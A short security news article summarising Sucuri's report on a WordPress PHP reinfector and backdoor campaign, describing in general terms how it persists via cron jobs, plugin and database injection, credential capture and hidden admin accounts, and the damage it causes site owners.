WordPress Websites at Risk Due to a Sophisticated PHP Reinfector and Backdoor

• Security researchers observed a complex malware campaign affecting WordPress websites by deploying a stealthy backdoor.
• Cron job manipulation, credential harvesting, and backdoor implementation are part of the infections.
• Self-propagation and persistent reinfection make this particular malware strain very difficult to eliminate from compromised environments.

A recent surge in WordPress website infections has brought to light a sophisticated PHP reinfector and backdoor malware. While initially suspected to be linked to the WPCode plugin, further investigation revealed a wider scope of infection.

Sucuri recently reported on the malware's tactics and techniques, which proved hard to remove because it affected multiple files and database records. 

The attackers leverage WordPress's cron system to schedule regular execution of malicious scripts and use code that allows the creation of PHP files by passing the file contents as a request parameter to the backdoor.

It targets both plugin files and core WordPress database tables (wp_posts and wp_options) to ensure persistence. The malware injects malicious code into plugins, including popular ones like Imagify. This creates a backdoor that allows attackers to execute arbitrary PHP code.

The malware redirects users to malicious domains by injecting scripts into various parts of the website. It also captures and stores login credentials submitted through the WordPress admin login form and spreads itself across multiple plugins and database tables, making it difficult to remove.

The malicious admin user created by the malware has a random hexadecimal name and email, making it harder to detect.

Successful infections can lead to complete website compromise, allowing attackers to manipulate content, steal sensitive data, and launch further attacks. 

Malicious activities, such as spamming and hacking attempts, can damage a website's reputation and lead to search engine blacklisting. In some cases, attackers may hold websites hostage, demanding ransom payments to restore access.

In October, more than 6,000 WordPress websites were compromised by malicious plugin campaigns that push infostealers.